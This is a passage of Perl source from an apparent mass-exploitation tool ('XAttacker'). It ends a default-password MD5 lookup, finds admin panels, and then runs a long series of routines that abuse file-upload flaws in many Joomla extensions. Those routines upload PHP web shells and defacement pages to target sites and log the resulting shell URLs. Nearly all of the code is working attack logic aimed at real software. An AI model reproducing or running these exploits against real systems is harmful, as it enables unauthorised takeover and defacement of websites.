  2188. print TEXT "\nPassword : admin123456";
  2189. close (TEXT);
  2190. }
  2191. elsif ($hash =~ /0192023a7bbd73250516f069df18b500/){
  2192. print item(),"Cracking Hash : ";
  2193. print color('bold green'),"Found!";
  2194. print color('bold green')," [";
  2195. print color('bold red'),"+";
  2196. print color('bold green'),"] ";
  2197. print color('bold white'),"Password : admin123\n";
  2198. open (TEXT, '>>Result/databases.txt');
  2199. print TEXT "\nPassword : admin123";
  2200. close (TEXT);
  2201. }
  2202. elsif ($hash =~ /73acd9a5972130b75066c82595a1fae3/){
  2203. print item(),"Cracking Hash : ";
  2204. print color('bold green'),"Found!";
  2205. print color('bold green')," [";
  2206. print color('bold red'),"+";
  2207. print color('bold green'),"] ";
  2208. print color('bold white'),"Password : ADMIN\n";
  2209. open (TEXT, '>>Result/databases.txt');
  2210. print TEXT "\nPassword : ADMIN";
  2211. close (TEXT);
  2212. }
  2213. elsif ($hash =~ /7b7bc2512ee1fedcd76bdc68926d4f7b/){
  2214. print item(),"Cracking Hash : ";
  2215. print color('bold green'),"Found!";
  2216. print color('bold green')," [";
  2217. print color('bold red'),"+";
  2218. print color('bold green'),"] ";
  2219. print color('bold white'),"Password : Administrator\n";
  2220. open (TEXT, '>>Result/databases.txt');
  2221. print TEXT "\nPassword : Administrator";
  2222. close (TEXT);
  2223. }
  2224. elsif ($hash =~ /c21f969b5f03d33d43e04f8f136e7682/){
  2225. print item(),"Cracking Hash : ";
  2226. print color('bold green'),"Found!";
  2227. print color('bold green')," [";
  2228. print color('bold red'),"+";
  2229. print color('bold green'),"] ";
  2230. print color('bold white'),"Password : default\n";
  2231. open (TEXT, '>>Result/databases.txt');
  2232. print TEXT "\nPassword : default";
  2233. close (TEXT);
  2234. }
  2235. elsif ($hash =~ /1a1dc91c907325c69271ddf0c944bc72/){
  2236. print item(),"Cracking Hash : ";
  2237. print color('bold green'),"Found!";
  2238. print color('bold green')," [";
  2239. print color('bold red'),"+";
  2240. print color('bold green'),"] ";
  2241. print color('bold white'),"Password : pass\n";
  2242. open (TEXT, '>>Result/databases.txt');
  2243. print TEXT "\nPassword : pass";
  2244. close (TEXT);
  2245. }
  2246. elsif ($hash =~ /5f4dcc3b5aa765d61d8327deb882cf99/){
  2247. print item(),"Cracking Hash : ";
  2248. print color('bold green'),"Found!";
  2249. print color('bold green')," [";
  2250. print color('bold red'),"+";
  2251. print color('bold green'),"] ";
  2252. print color('bold white'),"Password : password\n";
  2253. open (TEXT, '>>Result/databases.txt');
  2254. print TEXT "\nPassword : password";
  2255. close (TEXT);
  2256. }
  2257. elsif ($hash =~ /098f6bcd4621d373cade4e832627b4f6/){
  2258. print item(),"Cracking Hash : ";
  2259. print color('bold green'),"Found!";
  2260. print color('bold green')," [";
  2261. print color('bold red'),"+";
  2262. print color('bold green'),"] ";
  2263. print color('bold white'),"Password : test\n";
  2264. open (TEXT, '>>Result/databases.txt');
  2265. print TEXT "\nPassword : test";
  2266. close (TEXT);
  2267. }
  2268. elsif ($hash =~ /21232f297a57a5a743894a0e4a801fc3/){
  2269. print item(),"Cracking Hash : ";
  2270. print color('bold green'),"Found!";
  2271. print color('bold green')," [";
  2272. print color('bold red'),"+";
  2273. print color('bold green'),"] ";
  2274. print color('bold white'),"Password : admin\n";
  2275. open (TEXT, '>>Result/databases.txt');
  2276. print TEXT "\nPassword : admin";
  2277. close (TEXT);
  2278. }
  2279. elsif ($hash =~ /fe01ce2a7fbac8fafaed7c982a04e229/){
  2280. print item(),"Cracking Hash : ";
  2281. print color('bold green'),"Found!\n";
  2282. print color('bold green')," [";
  2283. print color('bold red'),"+";
  2284. print color('bold green'),"] ";
  2285. print color('bold white'),"Password : demo\n";
  2286. open (TEXT, '>>Result/databases.txt');
  2287. print TEXT "\nPassword : demo";
  2288. close (TEXT);
  2289. }
  2290. else{
  2291. print color('bold green')," [";
  2292. print color('bold red'),"+";
  2293. print color('bold green'),"] ";
  2294. print color('bold white'),"Password : ";
  2295. print color('bold red'),"NOt FOUND\n";
  2296. }
  2297. }
  2298.  
  2299. sub lokopanel(){
  2300. $ua = LWP::UserAgent->new();
  2301. $ua->agent("Mozilla/5.0 (X11; U; Linux i686; en-US; rv:0.9.3) Gecko/20010801");
  2302. $ua->timeout(15);
  2303. $pathone = "$site/redaktur";
  2304. my $lokomediacms = $ua->get("$pathone")->content;
  2305. if($lokomediapathone =~/administrator|username|password/) {
  2306. print item(),"Admin Panel : ";
  2307. print color('bold green'),"Found!\n";
  2308. print color('bold green')," [";
  2309. print color('bold red'),"+";
  2310. print color('bold green'),"] ";
  2311. print color('bold white'),"URL : $pathone\n\n";
  2312. open (TEXT, '>>Result/databases.txt');
  2313. print TEXT "\nURL : $pathone";
  2314. close (TEXT);
  2315. }
  2316. else{
  2317. print color('bold green')," [";
  2318. print color('bold red'),"+";
  2319. print color('bold green'),"] ";
  2320. print color('bold white'),"Admin Panel : ";
  2321. print color('bold red'),"NOt FOUND\n\n";
  2322. }
  2323. }
  2324.  
  2325. ################################################################
  2326. # #
  2327. # JOOMLA #
  2328. # #
  2329. ################################################################
  2330.  
  2331. sub comjce(){
  2332. $ua = LWP::UserAgent->new();
  2333. $ua->agent("Mozilla/5.0 (X11; U; Linux i686; en-US; rv:0.9.3) Gecko/20010801");
  2334. $ua->timeout(15);
  2335.  
  2336.  
  2337. my $jceurl="$site/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20";
  2338.  
  2339. my $res = $ua->post($jceurl,
  2340. Content_Type => 'form-data',
  2341. Content => [
  2342. 'upload-dir' => './../../',
  2343. 'upload-overwrite' => 0,
  2344. 'Filedata' => ["XAttacker.gif"],
  2345. 'action' => 'upload'
  2346. ]
  2347. )->decoded_content;
  2348.  
  2349. $remote = IO::Socket::INET->new(
  2350. Proto=>'tcp',
  2351. PeerAddr=>"$site",
  2352. PeerPort=>80,
  2353. Timeout=>15
  2354. );
  2355. $jceup= "$site/XAttacker.gif";
  2356. $checkjce = $ua->get("$jceup")->content_type;
  2357. if($checkjce =~/image\/gif/) {
  2358. print item(),"Com Jce";
  2359. print color('bold white')," ........................... ";
  2360. print color('bold green'),"VULN\n";
  2361. print item(),"Picture Uploaded Successfully\n";
  2362. print color('bold white')," [Link] => $jceup\n";
  2363. open (TEXT, '>>Result/Index.txt');
  2364. print TEXT "$jceup\n";
  2365. close (TEXT);
  2366. }else{
  2367. print item(),"Com Jce";
  2368. print color('bold white')," ........................... ";
  2369. print color('bold red'),"NOt VULN\n";
  2370. }
  2371. }
  2372.  
  2373.  
  2374. ################ Com Media #####################
  2375. sub comedia(){
  2376. my $url = "$site/index.php?option=com_media&view=images&tmpl=component&fieldid=&e_name=jform_articletext&asset=com_content&author=&folder=";
  2377. my $index ="XAttacker.txt";
  2378. my $field_name = "Filedata[]";
  2379.  
  2380. my $response = $ua->post( $url,
  2381. Content_Type => 'form-data',
  2382. Content => [ $field_name => ["$index"] ]
  2383.  
  2384. );
  2385.  
  2386. $mediaup="$site/images/XAttacker.txt";
  2387.  
  2388. $checkpofwup = $ua->get("$mediaup")->content;
  2389. if($checkpofwup =~/HaCKeD/) {
  2390. print item(),"Com Media";
  2391. print color('bold white')," ......................... ";
  2392. print color('bold green'),"VULN\n";
  2393. print item(),"File Uploaded Successfully\n";
  2394. print color('bold white')," [Link] => $mediaup\n";
  2395. open (TEXT, '>>Result/Index.txt');
  2396. print TEXT "$mediaup\n";
  2397. close (TEXT);
  2398. }else{
  2399. print item(),"Com Media";
  2400. print color('bold white')," ......................... ";
  2401. print color('bold red'),"NOt VULN\n";
  2402. }
  2403. }
  2404.  
  2405.  
  2406. ################ comjdownloads #####################
  2407. sub comjdownloads(){
  2408. $file="Jattack.rar";
  2409. $filez="XAttacker.php.php.j";
  2410. $jdup= $site . 'index.php?option=com_jdownloads&Itemid=0&view=upload';
  2411. $shellpath= $site . '/images/jdownloads/screenshots/XAttacker.php.j?X=Attacker';
  2412.  
  2413. my $ua = LWP::UserAgent->new(ssl_opts => { verify_hostname => 0 });
  2414. $ua->timeout(10);
  2415. $ua->agent("Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.63 Safari/537.31");
  2416.  
  2417. my $exploit = $ua->post("$jdup", Cookie => "", Content_Type => "form-data", Content => [ name=>"Mohamed Riahi", mail=>"blablabla@blablabla.com", filetitle =>"Mohamed Riahi xD", catlist=>"1", license=>"0", language=>"0", system=>"0",file_upload=>["$file"], pic_upload=>["$filez"], description=>"<p>zot</p>", senden=>"Send file", option=>"com_jdownloads", view=>"upload", send=>"1", "24c22896d6fe6977b731543b3e44c22f"=>"1"]);
  2418.  
  2419. my $checkshell = $ua->get("$shellpath")->content;
  2420. if($checkshell =~/X Attacker/) {
  2421. print item(),"Com Jdownloads";
  2422. print color('bold white')," .................... ";
  2423. print color('bold green'),"VULN\n";
  2424. print item(),"Shell Uploaded Successfully\n";
  2425. print color('bold white')," [Link] => $shellpath\n";
  2426. open (TEXT, '>>Result/Shells.txt');
  2427. print TEXT "$shellpath\n";
  2428. close (TEXT);
  2429. }else{
  2430. print item(),"Com Jdownloads";
  2431. print color('bold white')," .................... ";
  2432. print color('bold red'),"NOt VULN\n";
  2433. }
  2434. }
  2435.  
  2436.  
  2437. ################ comjdownloads index #####################
  2438. sub comjdownloadsdef(){
  2439. $def = $site . '/images/jdownloads/screenshots/XAttacker.html.j';
  2440. $filee="Jattack.rar";
  2441. $filezz="XAttacker.html.j";
  2442. my $exploitx = $ua->post("$jdup", Cookie => "", Content_Type => "form-data", Content => [ name=>"Mohamed Riahi", mail=>"moham3driahi@gmail.com", filetitle =>"Mohamed Riahi xD", catlist=>"1", license=>"0", language=>"0", system=>"0",file_upload=>["$filee"], pic_upload=>["$filezz"], description=>"<p>zot</p>", senden=>"Send file", option=>"com_jdownloads", view=>"upload", send=>"1", "24c22896d6fe6977b731543b3e44c22f"=>"1"]);
  2443. if ($exploitx->content =~ /The file was successfully transferred to the server/) {
  2444.  
  2445.  
  2446. my $response = $ua->get("$def")->status_line;
  2447. if ($response =~ /200/){
  2448. print item(),"Com Jdownloads Index";
  2449. print color('bold white')," .............. ";
  2450. print color('bold green'),"VULN\n";
  2451. print item(),"Index Uploaded Successfully\n";
  2452. print color('bold white')," [Link] => $def\n";
  2453. open (TEXT, '>>Result/Index.txt');
  2454. print TEXT "$def\n";
  2455. close (TEXT);
  2456. }else{
  2457. print item(),"Com Jdownloads Index";
  2458. print color('bold white')," .............. ";
  2459. print color('bold red'),"NOt VULN\n";
  2460. }
  2461. }
  2462. else{
  2463. print item(),"Com Jdownloads Index";
  2464. print color('bold white')," .............. ";
  2465. print color('bold red'),"NOt VULN\n";
  2466.  
  2467. }
  2468. }
  2469.  
  2470. ################ comfabrik #####################
  2471. sub comfabrik(){
  2472. my $url = "$site/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1";
  2473. my $shell ="XAttacker.php";
  2474. my $field_name = "Filedata";
  2475.  
  2476. my $response = $ua->post( $url,
  2477. Content_Type => 'form-data',
  2478. Content => ["userfile" => ["$shell"], "name" => "me.php", "drop_data" => "1", "overwrite" => "1", "field_delimiter" => ",", "text_delimiter" => "&quot;", "option" => "com_fabrik", "controller" => "import", "view" => "import", "task" => "doimport", "Itemid" => "0", "tableid" => "0"]
  2479.  
  2480. );
  2481.  
  2482. $comfabrikupp="$site/media/XAttacker.php?X=Attacker";
  2483.  
  2484. $checkcomfabrikupp = $ua->get("$comfabrikupp")->content;
  2485. if($checkcomfabrikupp =~/X Attacker/) {
  2486.  
  2487. print item(),"Com Fabrik";
  2488. print color('bold white')," ........................ ";
  2489. print color('bold green'),"VULN\n";
  2490. print item(),"Shell Uploaded Successfully\n";
  2491. print color('bold white')," [Link] => $comfabrikupp\n";
  2492. open (TEXT, '>>Result/shells.txt');
  2493. print TEXT "$comfabrikupp\n";
  2494. close (TEXT);
  2495. }else{
  2496. print item(),"Com Fabrik";
  2497. print color('bold white')," ........................ ";
  2498. print color('bold red'),"NOt VULN\n";
  2499. }
  2500. }
  2501.  
  2502. ################ comfabrik index #####################
  2503. sub comfabrikdef(){
  2504. my $url = "$site/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1";
  2505. my $index ="XAttacker.txt";
  2506. my $field_name = "Filedata[]";
  2507.  
  2508. my $response = $ua->post( $url,
  2509. Content_Type => 'form-data',
  2510. Content => ["userfile" => ["$index"], "name" => "me.php", "drop_data" => "1", "overwrite" => "1", "field_delimiter" => ",", "text_delimiter" => "&quot;", "option" => "com_fabrik", "controller" => "import", "view" => "import", "task" => "doimport", "Itemid" => "0", "tableid" => "0"]
  2511.  
  2512. );
  2513.  
  2514. $comfabrikup="$site/media/XAttacker.txt";
  2515.  
  2516. $checkcomfabrikup = $ua->get("$comfabrikup")->content;
  2517. if($checkcomfabrikup =~/HaCKeD/) {
  2518.  
  2519. print item(),"Com Fabrik Index";
  2520. print color('bold white')," .................. ";
  2521. print color('bold green'),"VULN\n";
  2522. print item(),"File Uploaded Successfully\n";
  2523. print color('bold white')," [Link] => $comfabrikup\n";
  2524. open (TEXT, '>>Result/Index.txt');
  2525. print TEXT "$comfabrikup\n";
  2526. close (TEXT);
  2527. }else{
  2528. print item(),"Com Fabrik Index";
  2529. print color('bold white')," .................. ";
  2530. print color('bold red'),"NOt VULN\n";
  2531. }
  2532. }
  2533. ################ comfabrik2 #####################
  2534. sub comfabrik2(){
  2535. my $url = "$site/index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload";
  2536. my $shell ="XAttacker.php";
  2537.  
  2538. my $response = $ua->post( $url,
  2539. Content_Type => 'form-data',
  2540. Content => ["file" => ["$shell"]]
  2541.  
  2542. );
  2543.  
  2544. $comfabrikupp2="$site/XAttacker.php?X=Attacker";
  2545.  
  2546. $checkcomfabrikupp = $ua->get("$comfabrikupp2")->content;
  2547. if($checkcomfabrikupp =~/X Attacker/) {
  2548.  
  2549. print item(),"Com Fabrik2";
  2550. print color('bold white')," ....................... ";
  2551. print color('bold green'),"VULN\n";
  2552. print item(),"Shell Uploaded Successfully\n";
  2553. print color('bold white')," [Link] => $comfabrikupp2\n";
  2554. open (TEXT, '>>Result/shells.txt');
  2555. print TEXT "$comfabrikupp\n";
  2556. close (TEXT);
  2557. }else{
  2558. print item(),"Com Fabrik2";
  2559. print color('bold white')," ....................... ";
  2560. print color('bold red'),"NOt VULN\n";
  2561. }
  2562. }
  2563.  
  2564. ################ comfabrik index2 #####################
  2565. sub comfabrikdef2(){
  2566. my $url = "$site/index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload";
  2567. my $index ="XAttacker.txt";
  2568.  
  2569. my $response = $ua->post( $url,
  2570. Content_Type => 'form-data',
  2571. Content => ["file" => ["$index"]]
  2572.  
  2573. );
  2574.  
  2575. $comfabrikup2="$site/XAttacker.txt";
  2576.  
  2577. $checkcomfabrikup = $ua->get("$comfabrikup2")->content;
  2578. if($checkcomfabrikup =~/HaCKeD/) {
  2579.  
  2580. print item(),"Com Fabrik Index2";
  2581. print color('bold white')," ................. ";
  2582. print color('bold green'),"VULN\n";
  2583. print item(),"File Uploaded Successfully\n";
  2584. print color('bold white')," [Link] => $comfabrikup2\n";
  2585. open (TEXT, '>>Result/Index.txt');
  2586. print TEXT "$comfabrikup2\n";
  2587. close (TEXT);
  2588. }else{
  2589. print item(),"Com Fabrik2 Index";
  2590. print color('bold white')," ................. ";
  2591. print color('bold red'),"NOt VULN\n";
  2592. }
  2593. }
  2594. ################ foxcontact #####################
  2595. sub foxcontact(){
  2596.  
  2597. @foxvuln= ("components/com_foxcontact/lib/file-uploader.php?cid={}&mid={}&qqfile=/../../_func.php",
  2598. "index.php?option=com_foxcontact&view=loader&type=uploader&owner=component&id={}?cid={}&mid={}&qqfile=/../../_func.php",
  2599. "index.php?option=com_foxcontact&amp;view=loader&amp;type=uploader&amp;owner=module&amp;id={}&cid={}&mid={}&owner=module&id={}&qqfile=/../../_func.php",
  2600. "components/com_foxcontact/lib/uploader.php?cid={}&mid={}&qqfile=/../../_func.php");
  2601. OUTER: foreach $foxvuln(@foxvuln){
  2602. chomp $foxvuln;
  2603.  
  2604. my $url = "$site/$foxvuln";
  2605.  
  2606. my $shell ="XAttacker.php";
  2607.  
  2608. my $response = $ua->post($url, Content_Type => 'multipart/form-data', content => [ ["$shell"] ]);
  2609.  
  2610. $foxup="$site/components/com_foxcontact/_func.php?X=Attacker";
  2611. }
  2612. my $checkfoxup = $ua->get("$foxup")->content;
  2613. if ($checkfoxup =~ /X Attacker/) {
  2614. print item(),"Com Foxcontact";
  2615. print color('bold white')," .................... ";
  2616. print color('bold green'),"VULN\n";
  2617. print item(),"Shell Uploaded Successfully\n";
  2618. print color('bold white')," [Link] => $foxup\n";
  2619. open (TEXT, '>>Result/shells.txt');
  2620. print TEXT "$foxup\n";
  2621. close (TEXT);
  2622. }else{
  2623. print item(),"Com Foxcontact";
  2624. print color('bold white')," .................... ";
  2625. print color('bold red'),"NOt VULN\n";
  2626. }
  2627. }
  2628.  
  2629.  
  2630. ################ comadsmanager #####################
  2631. sub comadsmanager(){
  2632. my $url = "$site/index.php?option=com_adsmanager&task=upload&tmpl=component";
  2633.  
  2634. my $response = $ua->post( $url,
  2635. Cookie => "", Content_Type => "form-data", Content => [file => ["XAttacker.jpg"], name => "XAttacker.html"]
  2636.  
  2637. );
  2638.  
  2639. $comadsmanagerup="$site/tmp/plupload/XAttacker.html";
  2640.  
  2641. $checkcomadsmanagerup = $ua->get("$comadsmanagerup")->content;
  2642. if($checkcomadsmanagerup =~/HaCKeD/) {
  2643. print item(),"Com Ads Manager";
  2644. print color('bold white')," ................... ";
  2645. print color('bold green'),"VULN\n";
  2646. print item(),"File Uploaded Successfully\n";
  2647. print color('bold white')," [Link] => $comadsmanagerup\n";
  2648. open (TEXT, '>>Result/Index.txt');
  2649. print TEXT "$comadsmanagerup\n";
  2650. close (TEXT);
  2651. }else{
  2652. print item(),"Com Ads Manager";
  2653. print color('bold white')," ................... ";
  2654. print color('bold red'),"NOt VULN\n";
  2655. }
  2656. }
  2657.  
  2658. sub comblog(){
  2659.  
  2660. my $url = "$site/index.php?option=com_myblog&task=ajaxupload";
  2661. my $checkblog = $ua->get("$url")->content;
  2662. if($checkblog =~/has been uploaded/) {
  2663. print item(),"Com Blog";
  2664. print color('bold white')," .......................... ";
  2665. print color('bold green'),"VULN\n";
  2666. print item(),"Exploit It It Manual\n";
  2667. open(save, '>>Result/vulntargets.txt');
  2668. print save "[blog] $site\n";
  2669. close(save);
  2670. }else{
  2671. print item(),"Com Blog";
  2672. print color('bold white')," .......................... ";
  2673. print color('bold red'),"NOt VULN\n";
  2674. }
  2675. }
  2676.  
  2677.  
  2678. sub comusers(){
  2679.  
  2680. my $url = "$site/index.php?option=com_users&view=registration";
  2681. my $checkomusers = $ua->get("$url")->content;
  2682. if($checkomusers =~/jform_email2-lbl/) {
  2683. print item(),"Com Users";
  2684. print color('bold white')," ......................... ";
  2685. print color('bold green'),"VULN\n";
  2686. print item(),"Exploit It Manual\n";
  2687. open(save, '>>Result/vulntargets.txt');
  2688. print save "[Com Users] $site\n";
  2689. close(save);
  2690. }else{
  2691. print item(),"Com Users";
  2692. print color('bold white')," ......................... ";
  2693. print color('bold red'),"NOt VULN\n";
  2694. }
  2695. }
  2696.  
  2697.  
  2698. ################ comweblinks #####################
  2699. sub comweblinks(){
  2700. $ua = LWP::UserAgent->new(keep_alive => 1);
  2701. $ua->agent("Mozilla/5.0 (X11; U; Linux i686; en-US; rv:0.9.3) Gecko/20010801");
  2702. $ua->timeout (30);
  2703. $ua->cookie_jar(
  2704. HTTP::Cookies->new(
  2705. file => 'mycookies.txt',
  2706. autosave => 1
  2707. )
  2708. );
  2709. $urlone ="$site/index.php?option=com_media&view=images&tmpl=component&e_name=jform_description&asset=com_weblinks&author=";
  2710. $token = $ua->get($urlone)->content;
  2711. if($token =~/<form action="(.*?)" id="uploadForm"/)
  2712. {
  2713. $url=$1;
  2714. }
  2715.  
  2716. my $index ="XAttacker.gif";
  2717. my $field_name = "Filedata[]";
  2718.  
  2719. my $response = $ua->post( $url,
  2720. Content_Type => 'form-data',
  2721. Content => [ $field_name => ["$index"] ]
  2722.  
  2723. );
  2724.  
  2725. $weblinksup= "$site/images/XAttacker.gif";
  2726. $check = $ua->get($weblinksup)->status_line;
  2727. if ($check =~ /200/){
  2728. print item(),"Com Weblinks";
  2729. print color('bold white')," ...................... ";
  2730. print color('bold green'),"VULN\n";
  2731. print item(),"Picture Uploaded Successfully\n";
  2732. print color('bold white')," [Link] => $weblinksup\n";
  2733. open (TEXT, '>>Result/Index.txt');
  2734. print TEXT "$weblinksup\n";
  2735. close (TEXT);
  2736. }else{
  2737. print item(),"Com Weblinks";
  2738. print color('bold white')," ...................... ";
  2739. print color('bold red'),"NOt VULN\n";
  2740. }
  2741. }
  2742.  
  2743. ################ mod_simplefileupload #####################
  2744. sub mod_simplefileupload(){
  2745. $ua = LWP::UserAgent->new(keep_alive => 1);
  2746. $ua->agent("Mozilla/5.0 (X11; U; Linux i686; en-US; rv:0.9.3) Gecko/20010801");
  2747. $ua->timeout (30);
  2748.  
  2749. $url ="$site/modules/mod_simplefileuploadv1.3/elements/udd.php";
  2750. $simplefileuploadsup= "$site/modules/mod_simplefileuploadv1.3/elements/XAttacker.php?X=Attacker";
  2751.  
  2752. my $shell ="XAttacker.php";
  2753.  
  2754. my $response = $ua->post( $url, Content_Type => "multipart/form-data", Content => [ file=>["$shell"] , submit=>"Upload" ]);
  2755.  
  2756. $check = $ua->get($simplefileuploadsup)->content;
  2757. if ($check =~ /X Attacker/){
  2758. print item(),"mod_simplefileupload";
  2759. print color('bold white')," .............. ";
  2760. print color('bold green'),"VULN\n";
  2761. print item(),"Shell Uploaded Successfully\n";
  2762. print color('bold white')," [Link] => $simplefileuploadsup\n\n";
  2763. open (TEXT, '>>Result/shells.txt');
  2764. print TEXT "$simplefileuploadsup\n";
  2765. close (TEXT);
  2766. }else{
  2767. print item(),"mod_simplefileupload";
  2768. print color('bold white')," .............. ";
  2769. print color('bold red'),"NOt VULN\n\n";
  2770. }
  2771. }
  2772.  
  2773. ################ Com Jbcatalog #####################
  2774. sub comjbcatalog(){
  2775. my $url = "$site/components/com_jbcatalog/libraries/jsupload/server/php";
  2776. my $field_name = "files[]";
  2777.  
  2778. my $response = $ua->post($url, Content_Type => 'multipart/form-data', Content => [ $field_name => ["XAttacker.php"]]);
  2779.  
  2780. $up="$site/components/com_jbcatalog/libraries/jsupload/server/php/files/XAttacker.php?X=Attacker";
  2781. $checkup = $ua->get("$up")->content;
  2782. if($checkup =~/X Attacker/) {
  2783. print item(),"Com Jbcatalog";
  2784. print color('bold white')," ..................... ";
  2785. print color('bold green'),"VULN\n";
  2786. print item(),"Shell Uploaded Successfully\n";
  2787. print color('bold white')," [Link] => $mediauph\n";
  2788. open (TEXT, '>>Result/shells.txt');
  2789. print TEXT "$mediauph\n";
  2790. close (TEXT);
  2791. }else{
  2792. print item(),"Com Jbcatalog";
  2793. print color('bold white')," ..................... ";
  2794. print color('bold red'),"NOt VULN\n";
  2795. }
  2796. }
  2797.  
  2798.  
  2799. ################ comsexycontactform #####################
  2800. sub sexycontactform(){
  2801. my $url = "$site/com_sexycontactform/fileupload/index.php";
  2802. my $shell ="XAttacker.php";
  2803. my $field_name = "files[]";
  2804.  
  2805. my $response = $ua->post( $url,
  2806. Content_Type => 'multipart/form-data',
  2807. Content => [ $field_name => ["$shell"] ]
  2808.  
  2809. );
  2810.  
  2811. $sexyup="$site/com_sexycontactform/fileupload/files/XAttacker.php?X=Attacker";
  2812.  
  2813. $checkpofxwup = $ua->get("$sexyup")->content;
  2814. if($checkpofxwup =~/X Attacker/) {
  2815. print item(),"Com Sexycontactform";
  2816. print color('bold white')," ............... ";
  2817. print color('bold green'),"VULN\n";
  2818. print item(),"Shell Uploaded Successfully\n";
  2819. print color('bold white')," [Link] => $sexyup\n";
  2820. open (TEXT, '>>Result/Shells.txt');
  2821. print TEXT "$sexyup\n";
  2822. close (TEXT);
  2823. }else{
  2824. print item(),"Com Sexycontactform";
  2825. print color('bold white')," ............... ";
  2826. print color('bold red'),"NOt VULN\n";
  2827. }
  2828. }
  2829.  
  2830. ################ comblog #####################
  2831. sub comblog(){
  2832. my $url = "$site/index.php?option=com_myblog&task=ajaxupload";
  2833. my $shell ="XAttacker.php.xxxjpg";
  2834. my $field_name = "fileToUpload";
  2835.  
  2836. my $response = $ua->post( $url,
  2837. Content_Type => 'multipart/form-data',
  2838. Content => [ $field_name => ["$shell"]]);
  2839.  
  2840. if ($response->content =~ /source: '(.*?)'/) {
  2841. $link=$1;
  2842.  
  2843. print item(),"Com Blog";
  2844. print color('bold white')," .......................... ";
  2845. print color('bold green'),"VULN\n";
  2846. print item(),"shell Uploaded Successfully\n";
  2847. print color('bold white')," [Link] => $link\n";
  2848. open(save, '>>Result/Shells.txt');
  2849. print TEXT "$link\n";
  2850. close (TEXT);
  2851. }else{
  2852. print item(),"Com Blog";
  2853. print color('bold white')," .......................... ";
  2854. print color('bold red'),"NOt VULN\n";
  2855. }
  2856. }
  2857.  
  2858. ################ comrokdownloads #####################
  2859. sub comrokdownloads(){
  2860. my $url = "$site/administrator/components/com_rokdownloads/assets/uploadhandler.php";
  2861. my $response = $ua->post($url, Content_Type => 'multipart/form-data',Content => ['Filedata' => ["XAttacker.php.xxxjpg"], "jpath" => "..%2F..%2F..%2F..%2F" ]);
  2862.  
  2863. $up="$site/images/stories/XAttacker.php.xxxjpg?X=Attacker";
  2864.  
  2865. $checkup = $ua->get("$up")->content;
  2866. if($checkup =~/X Attacker/) {
  2867.  
  2868. print item(),"Com Rokdownloads";
  2869. print color('bold white')," .................. ";
  2870. print color('bold green'),"VULN\n";
  2871. print item(),"Shell Uploaded Successfully\n";
  2872. print color('bold white')," [Link] => $up\n";
  2873. open(save, '>>Result/Shells.txt');
  2874. print TEXT "$up\n";
  2875. close (TEXT);
  2876. }else{
  2877. print item(),"Com Rokdownloads";
  2878. print color('bold white')," .................. ";
  2879. print color('bold red'),"NOt VULN\n";
  2880. }
  2881. }
  2882.  
  2883. sub extplorer(){
  2884. my $url = "$site/administrator/components/com_extplorer/uploadhandler.php";
  2885. my $shell ="XAttacker.php.xxxjpg";
  2886. my $field_name = "Filedata";
  2887.  
  2888. my $response = $ua->post( $url,
  2889. Content_Type => 'multipart/form-data',
  2890. Content => [ $field_name => ["$shell"]]);
  2891.  
  2892. $up="$site/images/stories/XAttacker.php.xxxjpg?X=Attacker";
  2893. $checkup = $ua->get("$up")->content;
  2894. if($checkup =~/X Attacker/) {
  2895.  
  2896. print item(),"Com Extplorer";
  2897. print color('bold white')," ..................... ";
  2898. print color('bold green'),"VULN\n";
  2899. print item(),"shell Uploaded Successfully\n";
  2900. print color('bold white')," [Link] => $up\n";
  2901. open(save, '>>Result/Shells.txt');
  2902. print TEXT "$up\n";
  2903. close (TEXT);
  2904. }else{
  2905. print item(),"Com Extplorer";
  2906. print color('bold white')," ..................... ";
  2907. print color('bold red'),"NOt VULN\n";
  2908. }
  2909. }
  2910.  
  2911. ################ com_jwallpapers #####################
  2912. sub comjwallpapers(){
  2913. $ua = LWP::UserAgent->new(keep_alive => 1);
  2914. $ua->agent("Mozilla/5.0 (X11; U; Linux i686; en-US; rv:0.9.3) Gecko/20010801");
  2915. $ua->timeout (30);
  2916.  
  2917. $url ="$site/index.php?option=com_jwallpapers&task=upload";
  2918. $comjwallpapersup= "$site/jwallpapers_files/plupload/XAttacker.php?X=Attacker";
  2919. my $shell ="XAttacker.php";
  2920.  
  2921. my $response = $ua->post( $url, Content_Type => "multipart/form-data", Content => [ file=>["$shell"] , submit=>"Upload" ]);
  2922.  
  2923. $check = $ua->get($comjwallpapersup)->content;
  2924. if ($check =~ /X Attacker/){
  2925. print item(),"Com Jwallpapers";
  2926. print color('bold white')," ................... ";
  2927. print color('bold green'),"VULN\n";
  2928. print item(),"Shell Uploaded Successfully\n";
  2929. print color('bold white')," [Link] => $comjwallpapersup\n";
  2930. open (TEXT, '>>Result/shells.txt');
  2931. print TEXT "$comjwallpapersup\n";
  2932. close (TEXT);
  2933. }else{
  2934. print item(),"Com Jwallpapers";
  2935. print color('bold white')," ................... ";
  2936. print color('bold red'),"NOt VULN\n";
  2937. }
  2938. }
  2939.  
  2940. ################ com_facileforms #####################
  2941. sub com_facileforms(){
  2942. $ua = LWP::UserAgent->new(keep_alive => 1);
  2943. $ua->agent("Mozilla/5.0 (X11; U; Linux i686; en-US; rv:0.9.3) Gecko/20010801");
  2944. $ua->timeout (30);
  2945.  
  2946. $url ="$site/components/com_facileforms/libraries/jquery/uploadify.php";
  2947. $up= "$site/components/com_facileforms/libraries/jquery/XAttacker.php?X=Attacker";
  2948.  
  2949. my $response = $ua->post( $url, Content_Type => "multipart/form-data", Content => [ Filedata=>["$shell"] , 'folder'=>'/components/com_facileforms/libraries/jquery/' ]);
  2950.  
  2951. $check = $ua->get($up)->content;
  2952. if ($check =~ /X Attacker/){
  2953. print item(),"Com Facileforms";
  2954. print color('bold white')," ................... ";
  2955. print color('bold green'),"VULN\n";
  2956. print item(),"Shell Uploaded Successfully\n";
  2957. print color('bold white')," [Link] => $comjwallpapersup\n";
  2958. open (TEXT, '>>Result/shells.txt');
  2959. print TEXT "$up\n";
  2960. close (TEXT);
  2961. }else{
  2962. print item(),"Com Facileforms";
  2963. print color('bold white')," ................... ";
  2964. print color('bold red'),"NOt VULN\n";
  2965. }
  2966. }
  2967.  
  2968. ##########################################################
